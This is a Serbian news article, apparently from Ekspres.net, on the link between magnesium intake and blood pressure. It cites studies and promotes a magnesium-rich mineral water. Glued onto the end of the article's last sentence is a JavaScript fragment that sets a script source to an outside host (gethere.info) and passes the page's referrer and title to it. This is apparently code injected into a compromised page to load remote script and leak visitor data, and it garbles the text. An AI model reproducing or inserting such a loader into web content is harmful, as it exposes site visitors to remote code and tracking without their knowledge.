Vesti
27.07.2016. 12:47
ekspres

Magnezijum i krvni pritisak - postoji li veza?

Ekspres.net
Izvor: Ekspres.net

Magnezijum blagotvorno deluje na više od 350 enzimskih procesa u organizmu i neophodan je za proizvodnju energije, razvoj i pravilan rad mišića i nervnog sistema. Doprinosi održavanju normalne aktivnosti srčanog ritma i nivoa arterijskog krvnog pritiska.

Preporučeni unos magnezijuma je 375 mg/dan, međutim, istraživanja pokazuju da veliki deo populacije ne unosi ovu količinu svakodnevnom ishranom.

Nizak nivo magnezijuma u organizmu povezan je sa poremećenom ravnotežom elektrolita, povišenim krvnim pritiskom, koronarnom bolesti srca, smanjenom osetljivošću na insulin, šećernom bolesti tipa 2, metaboličkim sindromom, pre-eklampsijom (trudnoćom izazvana hipertenzija i izlučivanje proteina u mokraći)...

EPIC-Norfolk studija iz 2015. godine, sprovedena na grupi od više od 4400 ispitanika utvrdila je povezanost nedovoljnog unosa magnezijuma putem hrane sa povišenim krvnim pritiskom i povećanim rizikom od moždanog udara.

Nizak nivo magnezijuma povezan je sa visokim krvnim pritiskom čak i kod dece, što je pokazala studija sprovedena na njih gotovo 4000, starosti od 6 do 15 godina. Najnovija analiza iz 2016. godine, koja je obradila rezultate 33 sprovedena istraživanja na više od 2500 ispitanika, pokazala je da se najbolje dejstvo magnezijuma na sniženje krvnog pritiska postiže dodatnim unosom od ≥300 mg/dan tokom dva meseca ili duže.

Prirodna mineralna voda Mg Mivela sa svojih 343mg/l idealan je izvor magnezijuma i gotovo zadovoljava preporučeni dnevni unos magnezijuma. Prirodni magnezijum u Mg Miveli organizam lako apsorbuje iz tankog creva u krvotok. Sa aspekta nutritivnog sastava namirnica, hranu sa najvećom količinom magnezijuma čine orašasti plodovi, semenke, mahunarke, zeleno lisnato povrće, integralne žitarice i prirodne mineralne vode bogate magnezijumom.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
light rain
13°C
16.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve